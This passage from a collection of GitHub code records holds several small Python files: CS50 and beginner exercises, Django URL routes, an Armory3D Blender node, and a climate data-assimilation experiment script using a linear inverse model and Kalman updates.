students:\n# if student[\"house\"] not in houses:\n# houses.append(student[\"house\"])\n\n\n# for house in sorted(houses):\n # print(house)\n#=====================================================\n\nhouses= set()\n\nfor student in students:\n houses.add(student[\"house\"])\n \nfor house in sorted(houses):\n print(house)\n \n","repo_name":"swapnilAngarkhe/cs50UnOfficial","sub_path":"python_cs50/week9/houses.py","file_name":"houses.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
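# A minimal sketch, not part of the original houses.py above: the loop-and-add
# pattern there is the explicit version; a set comprehension is the idiomatic
# one-liner for the same de-duplication. Reusing two of the entries from above:
students = [
    {"name": "Hermoine", "house": "gryffindoor"},
    {"name": "draco", "house": "Slythrin"},
]
houses = {student["house"] for student in students}
for house in sorted(houses):
    print(house)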
+{"seq_id":"13879792500","text":"import tkinter as df\r\nfile_0 = open('1_1.txt').read().split()\r\nlst = []\r\ndef gf():\r\n for i in file_0:\r\n if i.isdigit():\r\n lst.append(int(i))\r\n sum(lst) \r\n df.Label(win, text = f\"Answer: {sum(lst)}\").pack()\r\n\r\nwin = df.Tk()\r\nbtn_1 = df.Button(win, text = \"click me\", command = gf).pack()\r\nwin.mainloop()\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Tenchmarn/Python_LGU","sub_path":"LB_3_(10.09.2022)/Задание_1_вр(1).py","file_name":"Задание_1_вр(1).py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21257808734","text":"from django.urls import path\nfrom django.contrib import admin\n\n\nfrom accounts.views import (register_view,\n\t\t\t\t\t\t\tlogin_view,\n\t\t\t\t\t\t\t# RegisterView,\n\t\t\t\t\t\t\tlogout_view,\n\t\t\t\t\t\t\t)\n\nurlpatterns = [\n # path('register/', RegisterView.as_view(), name='register'),\n path('register/', register_view, name='register'),\n\tpath('login/', login_view, name='login'),\n path('logout/', logout_view, name='logout'),\n]","repo_name":"priyesh-04/blog","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18522355905","text":"saque = saqueRest = 0\r\n\r\nprint('-='*15)\r\nprint(' BBM')\r\n\r\nwhile True:\r\n print('-=' * 15)\r\n saque = int(input('Enter the amount to be withdrawn: '))\r\n print('-' * 30)\r\n while saque != 0:\r\n if (saque % 50) != 0:\r\n print(f'Total of {saque // 50} R$50 bills')\r\n saqueRest = saque % 50\r\n if saqueRest % 20 != 0:\r\n print(f'Total of {saqueRest // 20} R$20 bills')\r\n saqueRest = saqueRest % 20\r\n if saqueRest % 10 != 0:\r\n print(f'Total of {saqueRest // 10} R$10 bills')\r\n saqueRest = saqueRest % 10\r\n print(f'Total of {saqueRest // 1} R$1 bills')\r\n break\r\n else:\r\n print(f'Total of {saqueRest // 10} R$10 bills')\r\n break\r\n else:\r\n print(f'Total of {saqueRest // 20} R$20 bills')\r\n break\r\n else:\r\n print(f'Total of {saque // 50} R$50 bills')\r\n break\r\n opcao = str(input('Do you want to make another transaction? [S/N]: ')).upper().strip()\r\n while opcao not in 'SN':\r\n print('-=' * 15)\r\n opcao = str(input('Do you want to make another transaction? [S/N]: ')).upper().strip()\r\n if opcao == 'N':\r\n break\r\nprint('-'*15)\r\nprint('THANK YOU FOR YOUR BUSINESS!')\r\n","repo_name":"samurai-py/100-exercises-python-curso-em-video","sub_path":"Mundo 2/ex071.py","file_name":"ex071.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70911720360","text":"from arm.logicnode.arm_nodes import *\n\nclass SetMaterialRgbParamNode(ArmLogicTreeNode):\n \"\"\"Set a color or vector value material parameter to the specified object. \n \n @seeNode Get Scene Root\n \n @input Object: Object whose material parameter should change. Use `Get Scene Root` node to set parameter globally.\n \n @input Per Object: \n - `Enabled`: Set material parameter specific to this object. 
Global parameter will be ignored.\n - `Disabled`: Set parameter globally, including this object.\n\n @input Material: Material whose parameter to be set.\n\n @input Node: Name of the parameter.\n\n @input Color: Color or vector input.\n \"\"\"\n bl_idname = 'LNSetMaterialRgbParamNode'\n bl_label = 'Set Material RGB Param'\n arm_section = 'params'\n arm_version = 2\n\n def arm_init(self, context):\n self.add_input('ArmNodeSocketAction', 'In')\n self.add_input('ArmNodeSocketObject', 'Object')\n self.add_input('ArmBoolSocket', 'Per Object')\n self.add_input('ArmDynamicSocket', 'Material')\n self.add_input('ArmStringSocket', 'Node')\n self.add_input('ArmColorSocket', 'Color')\n\n self.add_output('ArmNodeSocketAction', 'Out')\n\n def get_replacement_node(self, node_tree: bpy.types.NodeTree):\n if self.arm_version not in (0, 1):\n raise LookupError()\n \n return NodeReplacement(\n 'LNSetMaterialRgbParamNode', self.arm_version, 'LNSetMaterialRgbParamNode', 2,\n in_socket_mapping={0:0, 1:3, 2:4, 3:5}, out_socket_mapping={0:0}\n )\n","repo_name":"armory3d/armory","sub_path":"blender/arm/logicnode/material/LN_set_material_rgb_param.py","file_name":"LN_set_material_rgb_param.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":2916,"dataset":"github-code","pt":"18"} +{"seq_id":"38930831591","text":"#\n# Originator: Greg Hakim\n# December 2020\n#\n# perform DA experiments to assess assimilation impact on analyses and forecasts. \n#\n\n\"\"\"\n------------------------------\nstart: user defined parameters\n------------------------------\n\"\"\"\n\n# set the observations for all experiments \n#obnet = 'atmos'\n#obnet = 'ocean'\nobnet = 'all'\n\n# list of DA experiments ('uncoupled'=WCDA; 'coupled'=SCDA)\nDA_expts = ['coupled','atmos','ocean','uncoupled']\n\n# set the DA cycling time \nDA_dt = 1\n\n# error type ('standard'=truncation error; 'linreg_' options remove bits that covary with state)\n#error_type = 'standard'\nerror_type = 'linreg_multi'\n\n# save the O-F statistics and forecasts to a file, with the label defined below\n#save_stats = False\nsave_stats = True\nfile_label = error_type+'_paper'\n\n# use netcdf preprocessed files\nuse_nc = True\n#use_nc = False\n\n# set the (uncorrelated) observation error here in a dictionary (dimensional, std)\nofac = 0.\noberr_dict = {}\noberr_dict['tas'] = ofac*1.0 # K\noberr_dict['tos'] = ofac*1.0 # K\noberr_dict['rlut'] = ofac*1.0 # K\noberr_dict['ua_850hPa'] = ofac*1.0 # K\noberr_dict['va_850hPa'] = ofac*1.0 # K\n\n# choose obs either in EOF space or on a lat-lon grid\n#ob_grid = 'eof'\nob_grid = 'latlon'\n\n# specify the LIM file\nlim_fname = './LIMd_CFSR_tas_tos_rlut_ua_850hPa_va_850hPa_1979_2010_ntrunc400_nmodes30.npy'\n\n# specify the observation file, and the companion state file\nofile = './obs_global_equalarea_tas_rlut_ua_850hPa_va_850hPa_tos_CFSR_20040101_20101231.npy'\nsfile = './state_CFSR_20040101_20101231.npy'\n\n# specify files containing the definitions for H, R, and N\nofile_prep = './obs_operators_global_equalarea_tas_rlut_ua_850hPa_va_850hPa_tos_CFSR_19790101_20031231.npy'\n\n# define atmos and ocean variables \nvars_atmos = ['tas','rlut','ua_850hPa','va_850hPa']\nvars_ocean = ['tos']\n\n\"\"\"\n------------------------------\nend: user defined parameters\n------------------------------\n\"\"\"\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport sys,os\nimport numpy as np\nimport xarray as xr\nimport datetime\nimport yaml\nimport LIM_utils_new as LIM_utils\nimport 
matplotlib\nimport matplotlib.pyplot as plt\nimport cartopy.crs as ccrs\nimport cartopy.feature\nfrom cartopy.util import add_cyclic_point\n\n# seed an instance of the random number generator (this is an object than can be passed to functions)\nrng = np.random.default_rng(2021)\n\n# read the observations\nobs_allvars = np.load(ofile,allow_pickle='TRUE').item()\n\n# read the truncated state that corresponds to the observations\nP_state = np.load(sfile,allow_pickle='TRUE').item() # dimensional!\n\n# assign variables to observation list based on obnet choice\nobvars_atmos = ['tas','rlut','ua_850hPa','va_850hPa']\nobvars_ocean = ['tos']\nobvars_all = obvars_atmos + obvars_ocean\n\n# timestamp this dataset\nwhen_created = datetime.datetime.now()\n\n# load the LIM (from LIM_train.py)\nprint('loading LIM file ',lim_fname)\nLIMd = np.load(lim_fname,allow_pickle='TRUE').item()\nscale_fac = LIMd['scale_fac']\nlimvars = LIMd['limvars']\nnEOF = LIMd['nEOF']\nnmodes = LIMd['nmodes']\nivars = LIMd['ivars']\nnvars = len(limvars)\n\n# set up the resolvant\nGt = np.matmul(np.matmul(LIMd['vec'],np.diag(np.exp(LIMd['lam']*DA_dt))),LIMd['veci'])\n\n# make variable-index look-up dictionary for atmos and ocean LIMs, like ivars does for all\nivars_atmos = {}\nivars_ocean = {}\nasi = 0\nosi = 0\nk = -1\nEOF_files = {}\nfor var in limvars:\n k +=1\n nnmodes = nmodes[k]\n EOF_files[var] = './CFSR_'+var+'_1979_2010_ntrunc400_mavg5.npy'\n\n if var in vars_ocean: # can generalize if needed\n oei = osi + nnmodes\n ivars_ocean[var] = list(range(osi,osi+nnmodes,1))\n osi = oei\n elif var in vars_atmos:\n aei = asi + nnmodes\n ivars_atmos[var] = list(range(asi,asi+nnmodes,1))\n asi = aei\n else:\n print('ERROR! this variable is not assigned to atmos or ocean')\n\n# set the observation operators and observation error covariance\nif ob_grid == 'eof':\n print('using identity obs in EOF space...')\n Htmp = np.zeros([ndof,ndof])\n Rdiag = np.ones(ndof)\n si = 0\n k = -1\n for var in limvars:\n k +=1\n nnmodes = nmodes[k]\n\n ei = si + nnmodes\n print('working on...',var,si,si+nnmodes)\n if var != 'tos': \n if obnet != 'ocean':\n Htmp[si:si+nnmodes,si:si+nnmodes] = np.eye(nnmodes)\n else:\n if obnet != 'atmos':\n Htmp[si:si+nnmodes,si:si+nnmodes] = np.eye(nnmodes)\n\n si = ei\n \n # fill in the diagonal observation error variance\n oberr = (oberr_dict[var])**2\n Rdiag[si:si+nnmodes,si:si+nnmodes] = oberr*Rdiag[si:si+nnmodes,si:si+nnmodes]\n \n # remove the empty rows (null obs) (https://stackoverflow.com/questions/11188364/remove-zero-lines-2-d-numpy-array)\n H = Htmp[~np.all(Htmp == 0,axis=0)]\n\n # diagonal ob-error covariance matrix\n nobs = H.shape[0]\n R = np.diag(Rdiag)\n\nelif ob_grid == 'latlon':\n\n # observing network is specified on a lat-lon grid\n print('using identity obs in lat-lon space from '+ofile)\n obs_allvars = np.load(ofile,allow_pickle='TRUE').item()\n \n print('using calibrated H, R, and N from '+ofile_prep)\n ob_prep = np.load(ofile_prep,allow_pickle='TRUE').item()\n \n # assign the observation variables\n print(\"observing network = obvars_%s\" % obnet)\n exec(\"obvars = obvars_%s\" % obnet)\n\n # load index info\n obinds = ob_prep['obinds']\n obinds_atmos = ob_prep['obinds_atmos']\n obinds_ocean = ob_prep['obinds_ocean']\n iatmos_obs = ob_prep['iatmos_obs']\n iocean_obs = ob_prep['iocean_obs']\n iatmos = ob_prep['iatmos']\n iocean = ob_prep['iocean']\n \n si = 0\n k = -1\n first_var = True\n Rdiag = []\n for var in limvars:\n k +=1\n nnmodes = nmodes[k]\n\n ei = si + nnmodes\n\n # note: obs_allvars 
has already been scaled\n # yh is the observation resolved in the truncated lat-lon space\n if var in obvars:\n nobs_var = obinds[var][1]-obinds[var][0]+1\n print('working on...',var,si,si+nnmodes,nobs_var)\n if first_var:\n allobs = obs_allvars[var]['obs_full']\n yh = obs_allvars[var]['obs_full'] - obs_allvars[var]['obs_trunc_error']\n first_var = False\n else:\n allobs = np.concatenate((allobs,obs_allvars[var]['obs_full']),axis=0)\n yh = np.concatenate((yh,obs_allvars[var]['obs_full']- obs_allvars[var]['obs_trunc_error']),axis=0)\n\n # fill in the (optional) diagonal observation error variance (\"instrument\" error)\n oberr = (oberr_dict[var])**2\n Rdiag = Rdiag + (oberr*np.ones(nobs_var)).tolist() \n print('Rdiag:',nobs_var,len(Rdiag),allobs.shape,yh.shape)\n\n # move on to next limvar\n si = ei\n\n nobs = allobs.shape[0]\n print('nobs = ',nobs)\n n_obtimes = allobs.shape[1]\n print('number of times with observations=',n_obtimes)\n\nelse:\n raise Exception('no valid observing grid')\n\nprint(np.trace(ob_prep['R']))\nprint(np.trace(ob_prep['Rn']))\nprint(np.trace(ob_prep['Rn_one']))\nprint(np.trace(ob_prep['Rn'])/np.trace(ob_prep['R']))\n\n# initialize calibrated LIM noise and training covariance\nNoise = ob_prep['Noise']\nC_0 = ob_prep['C_0']\n\n# select H & R here; do so consistently as they are paired\nif error_type == 'standard':\n H = ob_prep['H']\n R = ob_prep['R']\nelif error_type == 'linreg_multi':\n H = ob_prep['newH']\n R = ob_prep['Rn']\nelse:\n raise ValueError('this type of ob error not supported!')\n \n#\n# atmosphere and ocean specific pieces of N, H, R, and G\n#\nGatmos = Gt[iatmos,:][:,iatmos]\nGocean = Gt[iocean,:][:,iocean]\nprint('G:',Gt.shape,Gatmos.shape,Gocean.shape)\nNatmos = Noise[iatmos,:][:,iatmos]\nNocean = Noise[iocean,:][:,iocean]\nprint('Noise:',Noise.shape,Natmos.shape,Nocean.shape)\n# recall that H and R have different indices (observations, not state)\nHatmos = H[iatmos_obs,:][:,iatmos]\nHocean = H[iocean_obs,:][:,iocean]\nprint('H:',H.shape,Hatmos.shape,Hocean.shape)\nRatmos = R[iatmos_obs,:][:,iatmos_obs]\nRocean = R[iocean_obs,:][:,iocean_obs]\nprint('R:',R.shape,Ratmos.shape,Rocean.shape)\n# filter observations & Rdiag\nallobs_all = np.copy(allobs)\nallobs_atmos = np.copy(allobs[iatmos_obs,:])\nallobs_ocean = np.copy(allobs[iocean_obs,:])\nRdiag_all = np.array(Rdiag)\nRdiag_atmos = np.array(Rdiag)[iatmos_obs]\nRdiag_ocean = np.array(Rdiag)[iocean_obs]\n# save the originals since I recycle the names below\nRall = np.copy(R)\nHall = np.copy(H)\nGall = np.copy(Gt)\nNall = np.copy(Noise)\n\n\"\"\"\nloop over DA experiments.\n\nthe first step involves a forecast from the initialized state. the k=0 index \ntherefore applies to the *update* at the time of the first forecast, which is \nalso the time of the first observations. 
the last time is the time of the last \nobservations.\n\"\"\"\n\n# set up the resolvant\nGt = np.matmul(np.matmul(LIMd['vec'],np.diag(np.exp(LIMd['lam']*DA_dt))),LIMd['veci'])\nGatmos = Gt[iatmos,:][:,iatmos]\nGocean = Gt[iocean,:][:,iocean]\n\n# set the number of DA cycles (in units of DA_dt)\nnDA = n_obtimes\n#nDA = 100\n\nDA_results = {}\nfor DA_expt in DA_expts:\n print('DA case: ',DA_expt)\n\n # initialize according to the DA experiment\n if DA_expt == 'atmos':\n # atmos LIM and atmos obs only\n B = C_0[iatmos,:][:,iatmos]\n H = Hatmos\n R = np.copy(Ratmos) + np.diag(Rdiag_atmos)\n G = Gatmos\n Noise = Natmos\n allobs = allobs_atmos\n Rdiag = Rdiag_atmos\n elif DA_expt == 'ocean':\n # ocean LIM and ocean obs only\n B = C_0[iocean,:][:,iocean]\n #B = Bconv\n H = Hocean\n R = np.copy(Rocean) + np.diag(Rdiag_ocean)\n G = Gocean\n Noise = Nocean\n allobs = allobs_ocean\n Rdiag = Rdiag_ocean\n elif DA_expt == 'uncoupled':\n # coupled LIM and separate atmos and ocean DA (WCDA)\n B = C_0\n H = Hall\n G = Gall\n Noise = Nall\n allobs = allobs_all\n Rdiag = Rdiag_all\n R = np.copy(Rall) + np.diag(Rdiag_all)\n elif DA_expt == 'coupled':\n # coupled LIM and coupled DA (SCDA)\n B = C_0\n H = Hall\n G = Gall\n Noise = Nall\n allobs = allobs_all\n Rdiag = Rdiag_all\n R = np.copy(Rall) + np.diag(Rdiag_all)\n else:\n print('not a valid experiment')\n \n # number of observations\n nobs = H.shape[0]\n # number of state variables\n ndof = H.shape[1]\n \n print('done with setup',nobs,Rdiag.shape,nDA)\n\n # observations for all DA times\n tims = tuple(np.arange(0,nDA*DA_dt,DA_dt))\n Y = np.take(allobs,tims,axis=1)\n print('Y:',Y.shape)\n \n A = np.copy(B)\n xbm = np.zeros(ndof)\n xam = np.zeros(ndof)\n xbm_save = np.zeros([ndof,nDA])\n xam_save = np.zeros([ndof,nDA])\n \n dob = np.zeros([nobs,nDA])\n doa = np.zeros([nobs,nDA])\n dab = np.zeros([nobs,nDA])\n HBHT = np.zeros(nobs)\n HBHTpR = np.zeros(nobs)\n HAHT = np.zeros(nobs)\n \n for k in range(nDA):\n if np.mod(k,100)==0: print('DA cycle ',k,'= day',k*DA_dt)\n y = Y[:,k*DA_dt]\n # forecast\n xbm = np.matmul(G,xam) \n B = np.real(np.matmul(np.matmul(G,A),G.T)) + Noise\n # analysis\n if DA_expt == 'uncoupled':\n # unpack the atmos and ocean covariance matrices\n Batmos = B[iatmos,:][:,iatmos]\n Bocean = B[iocean,:][:,iocean]\n xam_atmos,Aatmos = LIM_utils.kalman_update(xbm[iatmos],Batmos,Hatmos,y[iatmos_obs],R[iatmos_obs,:][:,iatmos_obs])\n xam_ocean,Aocean = LIM_utils.kalman_update(xbm[iocean],Bocean,Hocean,y[iocean_obs],R[iocean_obs,:][:,iocean_obs])\n # repack the analysis state vector\n xam = np.zeros(ndof)\n xam[iatmos] = xam_atmos\n xam[iocean] = xam_ocean\n # repack the atmos and ocean matrices into the full state matrix\n A = np.zeros([ndof,ndof])\n kk = -1\n for ki in iatmos:\n kk +=1\n A[iatmos,ki] = Aatmos[:,kk]\n kk = -1\n for ki in iocean:\n kk +=1\n A[iocean,ki] = Aocean[:,kk] \n else:\n xam,A = LIM_utils.kalman_update(xbm,B,H,y,R)\n \n # save the state\n xbm_save[:,k] = xbm\n xam_save[:,k] = xam\n \n # desrosiers verification\n if DA_expt == 'uncoupled':\n dob[iatmos_obs,k] = y[iatmos_obs] - np.matmul(Hatmos,xbm[iatmos])\n dob[iocean_obs,k] = y[iocean_obs] - np.matmul(Hocean,xbm[iocean])\n doa[iatmos_obs,k] = y[iatmos_obs] - np.matmul(Hatmos,xam[iatmos])\n doa[iocean_obs,k] = y[iocean_obs] - np.matmul(Hocean,xam[iocean])\n dab[iatmos_obs,k] = np.matmul(Hatmos,xam[iatmos]) - np.matmul(Hatmos,xbm[iatmos])\n dab[iocean_obs,k] = np.matmul(Hocean,xam[iocean]) - np.matmul(Hocean,xbm[iocean])\n else:\n dob[:,k] = y - np.matmul(H,xbm)\n doa[:,k] 
= y - np.matmul(H,xam)\n dab[:,k] = np.matmul(H,xam) - np.matmul(H,xbm)\n\n # only check converged versions of A and B\n if DA_expt == 'uncoupled':\n # only save the diagonal elements of these\n HBHT[iatmos_obs] = np.diag(np.matmul(Hatmos,np.matmul(B[iatmos,:][:,iatmos],Hatmos.T)))\n HAHT[iatmos_obs] = np.diag(np.matmul(Hatmos,np.matmul(A[iatmos,:][:,iatmos],Hatmos.T)))\n HBHTpR[iatmos_obs] = HBHT[iatmos_obs] + np.diag(R[iatmos_obs,:][:,iatmos_obs])\n #\n HBHT[iocean_obs] = np.diag(np.matmul(Hocean,np.matmul(B[iocean,:][:,iocean],Hocean.T)))\n HAHT[iocean_obs] = np.diag(np.matmul(Hocean,np.matmul(A[iocean,:][:,iocean],Hocean.T)))\n HBHTpR[iocean_obs] = HBHT[iocean_obs] + np.diag(R[iocean_obs,:][:,iocean_obs])\n Rsave = np.zeros(nobs)\n Rsave[iatmos_obs] = np.diag(R[iatmos_obs,:][:,iatmos_obs])\n Rsave[iocean_obs] = np.diag(R[iocean_obs,:][:,iocean_obs])\n else:\n HBHT = np.diag(np.matmul(H,np.matmul(B,H.T)))\n HAHT = np.diag(np.matmul(H,np.matmul(A,H.T)))\n HBHTpR = HBHT + np.diag(R)\n Rsave = np.diag(R)\n \n # save the results (all times, so time series can be plotted)\n DA_results[DA_expt] = {'dob':dob,'doa':doa,'dab':dab}\n DA_results[DA_expt]['HBHT'] = HBHT\n DA_results[DA_expt]['HBHTpR'] = HBHTpR\n DA_results[DA_expt]['HAHT'] = HAHT\n DA_results[DA_expt]['Rsave'] = Rsave\n DA_results[DA_expt]['xbm'] = xbm_save\n DA_results[DA_expt]['A'] = A\n DA_results[DA_expt]['B'] = B\n DA_results[DA_expt]['xam'] = xam_save\n\n# verify all experiments\nDA_checks_all = {}\n\nfor DA_expt in DA_expts:\n DA_checks = {}\n dob = DA_results[DA_expt]['dob']\n doa = DA_results[DA_expt]['doa']\n dab = DA_results[DA_expt]['dab']\n HAHT = DA_results[DA_expt]['HAHT']\n HBHT = DA_results[DA_expt]['HBHT']\n HBHTpR = DA_results[DA_expt]['HBHTpR']\n Rsave = DA_results[DA_expt]['Rsave']\n\n # MSE\n dob_mse = np.mean(dob**2,axis=1)\n DA_checks['dob_mse'] = dob_mse\n dob_bias = np.mean(dob,1,keepdims=True)\n DA_checks['dob_bias'] = dob_bias\n\n # Desroziers checks\n dob = dob - np.mean(dob,1,keepdims=True)\n doa = doa - np.mean(doa,1,keepdims=True)\n dab = dab - np.mean(dab,1,keepdims=True)\n HBHT_check = np.matmul(dab,dob.T)/(nDA-1)\n HBHTpR_check = np.matmul(dob,dob.T)/(nDA-1)\n Rsave_check = np.matmul(doa,dob.T)/(nDA-1)\n HAHT_check = np.matmul(dab,doa.T)/(nDA-1)\n\n # print trace of checks\n print('HBHT:',np.sum(HBHT),np.trace(HBHT_check))\n print('HBHT + R:',np.sum(HBHTpR),np.trace(HBHTpR_check))\n print('R:',np.sum(Rsave),np.trace(Rsave_check))\n print('HAHT:',np.sum(HAHT),np.trace(HAHT_check))\n print(np.min(np.diag(HBHT_check)))\n print(np.min(np.diag(HBHTpR_check)))\n print(np.min(np.diag(HAHT_check)))\n DA_checks['HBHT_check'] = HBHT_check\n DA_checks['HBHTpR_check'] = HBHTpR_check\n DA_checks['Rsave_check'] = Rsave_check\n DA_checks['HAHT_check'] = HAHT_check\n \n DA_checks_all[DA_expt] = DA_checks\n\n# add data and save to a file\nDA_checks_all['obinds'] = obinds\nDA_checks_all['obinds_atmos'] = obinds_atmos\nDA_checks_all['obinds_ocean'] = obinds_ocean\nDA_checks_all['iatmos_obs'] = iatmos_obs\nDA_checks_all['iocean_obs'] = iocean_obs\nDA_checks_all['iocean'] = iocean\nDA_checks_all['iatmos'] = iatmos\nDA_checks_all['obvars_all'] = obvars_all\nDA_checks_all['obvars_atmos'] = obvars_atmos\nDA_checks_all['obvars_ocean'] = obvars_ocean\nDA_checks_all['DA_results'] = DA_results\nDA_checks_all['EOF_files'] = EOF_files\nDA_checks_all['nmodes'] = nmodes\nDA_checks_all['sfile'] = sfile\nDA_checks_all['ivars'] = ivars\nDA_checks_all['scale_fac'] = scale_fac\nDA_checks_all['limvars'] = limvars\nDA_checks_all['nDA'] = 
nDA\nDA_checks_all['obnet'] = obnet\nDA_checks_all['sfile'] = sfile\nDA_checks_all['ofile'] = ofile\nDA_checks_all['ofile_prep'] = ofile_prep\nDA_checks_all['ob_grid'] = ob_grid\n\n\"\"\"\nbegin forecasting experiments \n\"\"\"\n\n# make the full state matrix---moved to here to use Ptruth in forecasting\nprint(P_state.keys())\nfirst = True\nfor var in limvars:\n if first:\n Ptruth = P_state[var]\n first = False\n else:\n Ptruth = np.concatenate((Ptruth,P_state[var]),axis=0)\n \nprint(Ptruth.shape)\n\n# generate ocean mask\nvar = 'tos'\nvar_tru = P_state[var]\nvar_var = np.matmul(var_tru,var_tru.T)/(var_tru.shape[1]-1)\ninfile = EOF_files[var]\nif use_nc:\n npfile = LIM_utils.npydict_from_netcdf(infile[:-3]+'nc')\nelse:\n npfile = np.load(infile,allow_pickle='TRUE').item()\n\nlat_2d = npfile['lat_2d']\nlon_2d = npfile['lon_2d']\nnlat = lat_2d.shape[0]\nnlon = lat_2d.shape[1]\nvarinfile = npfile['varinfile']\nnnmodes = len(ivars[var]) # number of retained modes for this variable (as in the verification loop below)\nu_field = npfile['u_field'][varinfile].values[:,:nnmodes]\nvar_latlon = np.einsum('ij,ji->i',np.matmul(u_field,var_var),u_field.T)\nvar_latlon[var_latlon<1e-12]=np.nan\n# make masks that can be used with nan functions:\n# ocean_mask: 1 over ocean, nan over land\nocean_mask = np.copy(var_latlon)\nocean_mask[ocean_mask>1e-12]=1.0\nocean_mask[ocean_mask<1e-12]=np.nan\n\nnregions = 16 # number of geographical areas to average for regional means (hardwired)\nLIM_forecasts = {}\nlags = [0,1,2,3,4,5,6,7,8,9,10,15,20,25,30,40,50]\nprint('lags:',lags)\nLIM_forecasts['lags'] = lags\n\nfor DA_expt in DA_expts:\n # set initial conditions\n if DA_expt == 'atmos':\n print('----atmos control----')\n x = DA_checks_all['DA_results']['atmos']['xam']\n elif DA_expt == 'ocean':\n print('----ocean control----')\n x = DA_checks_all['DA_results']['ocean']['xam']\n elif DA_expt == 'cold':\n print('----cold start coupled----')\n x = Ptruth\n else:\n print('----'+DA_expt+'----')\n x = DA_checks_all['DA_results'][DA_expt]['xam']\n\n # forecasts for all lags---work needed here\n ndof = x.shape[0]\n ntims = x.shape[1]\n nlags = len(lags)\n x_forecast = np.zeros([nlags,ndof,ntims])\n ilag = -1\n for lag in lags:\n ilag +=1\n Gt = np.matmul(np.matmul(LIMd['vec'],np.diag(np.exp(LIMd['lam']*lag))),LIMd['veci'])\n if DA_expt == 'atmos':\n Gt = Gt[iatmos,:][:,iatmos]\n elif DA_expt == 'ocean':\n print('using G ocean for lag ',lag,ilag)\n Gt = Gt[iocean,:][:,iocean]\n # forecast for one lag; save in temp dictionary\n LIMfd_tmp = LIM_utils.LIM_forecast(LIMd,x,[lag],Gin=Gt)\n x_forecast[ilag,:,:] = LIMfd_tmp['x_forecast'][0,:,:]\n\n # fill the dictionary with the forecasts for all lags\n LIMfd = LIMfd_tmp\n LIMfd['x_forecast'] = x_forecast\n \n var_gm_save = {}\n mse_gm_save = {}\n mse_rm_save = {}\n mse_gm_alltims_save = {}\n all_save_var = {}\n \n # verify each variable\n var_info = {}\n for var in limvars:\n if DA_expt == 'atmos' and var in vars_ocean:\n continue\n elif DA_expt == 'ocean' and var in vars_atmos:\n continue\n elif DA_expt == 'atmos':\n istate = ivars_atmos[var]\n elif DA_expt == 'ocean':\n istate = ivars_ocean[var]\n elif DA_expt == 'cold':\n istate = ivars[var]\n else:\n istate = ivars[var]\n\n print('verifying '+var)\n nnmodes = len(ivars[var])\n infile = EOF_files[var]\n if use_nc:\n npfile = LIM_utils.npydict_from_netcdf(infile[:-3]+'nc')\n else:\n npfile = np.load(infile,allow_pickle='TRUE').item()\n\n lat_2d = npfile['lat_2d']\n lon_2d = npfile['lon_2d']\n nlat = lat_2d.shape[0]\n nlon = lat_2d.shape[1]\n var_info[var] = {'lat_2d':lat_2d,'lon_2d':lon_2d,'nlat':nlat,'nlon':nlon}\n varinfile = 
npfile['varinfile']\n u_field = npfile['u_field'][varinfile].values[:,:nnmodes]\n # apply ocean mask to tos\n if var == 'tos':\n u_field = ocean_mask[:,np.newaxis]*u_field\n \n # cold start forecasts don't need scaling, but everything else does\n if DA_expt == 'cold':\n scaling = 1.0\n else:\n scaling = scale_fac[var]\n\n var_gm = np.zeros(len(lags))\n mse_gm = np.zeros(len(lags))\n mse_rm = np.zeros([nregions,len(lags)])\n all_save = np.zeros([len(lags),u_field.shape[0]])\n mse_gm_alltims = np.zeros([len(lags),nDA])\n mse_gm_alltims[:] = np.nan\n ilag = -1\n for lag in lags:\n ilag +=1\n print('lag=',lag)\n ftims = tuple(np.arange(lag,nDA*DA_dt,DA_dt))\n verif = np.take(P_state[var],ftims,axis=1)\n nverif = verif.shape[1]\n if lag == 0:\n ferror = scaling*x[istate,:] - verif\n else:\n ferror = scaling*LIMfd['x_forecast'][ilag,istate,:-lag] - verif\n\n print('ferror shape:',ferror.shape)\n \n # MSE over time, then averaged in space (small storage)\n mse_c = np.matmul(ferror,ferror.T)/(ferror.shape[1]-1)\n mse_latlon = np.einsum('ij,ji->i',np.matmul(u_field,mse_c),u_field.T)\n err_latlon = np.reshape(mse_latlon,[nlat,nlon])\n mse_gm_tmp,_,_ = LIM_utils.global_hemispheric_means(err_latlon,lat_2d[:,0])\n mse_gm[ilag] = mse_gm_tmp\n all_save[ilag,:] = mse_latlon\n rnames,rmean = LIM_utils.PAGES2K_regional_means(err_latlon,lat_2d,lon_2d)\n mse_rm[:,ilag] = rmean[:,0]\n # MSE global mean as a function of time (large storage)\n msevar = np.matmul(u_field,ferror)**2\n tmp = np.reshape(msevar,[nlat,nlon,msevar.shape[1]])\n tmp2 = np.moveaxis(tmp,2,0)\n tmp,_,_ = LIM_utils.global_hemispheric_means(tmp2,lat_2d[:,0])\n mse_gm_alltims[ilag,lag:] = tmp\n\n # variance\n ferror = ferror - np.mean(ferror,axis=1,keepdims=True)\n evar_c = np.matmul(ferror,ferror.T)/(ferror.shape[1]-1)\n var_latlon = np.einsum('ij,ji->i',np.matmul(u_field,evar_c),u_field.T)\n err_latlon = np.reshape(var_latlon,[nlat,nlon])\n var_gm_tmp,_,_ = LIM_utils.global_hemispheric_means(err_latlon,lat_2d[:,0])\n var_gm[ilag] = var_gm_tmp\n\n # archive results in dictionaries\n var_gm_save[var] = var_gm\n mse_gm_save[var] = mse_gm\n mse_rm_save[var] = mse_rm\n all_save_var[var] = all_save\n mse_gm_alltims_save[var] = mse_gm_alltims\n\n # package up for each variable\n LIM_forecasts[DA_expt] = {'mse_rm_save':mse_rm_save,'mse_gm_alltims_save':mse_gm_alltims_save,'var_gm_save':var_gm_save,'mse_gm_save':mse_gm_save,'all_save_var':all_save_var,'var_info':var_info}\n\n# MSE by regional average; add names for the regions\nLIM_forecasts['region_names'] = rnames\n\n\"\"\"\nend forecasting experiments \n\"\"\"\n\n# add forecasting results to the existing dictionary and save the whole 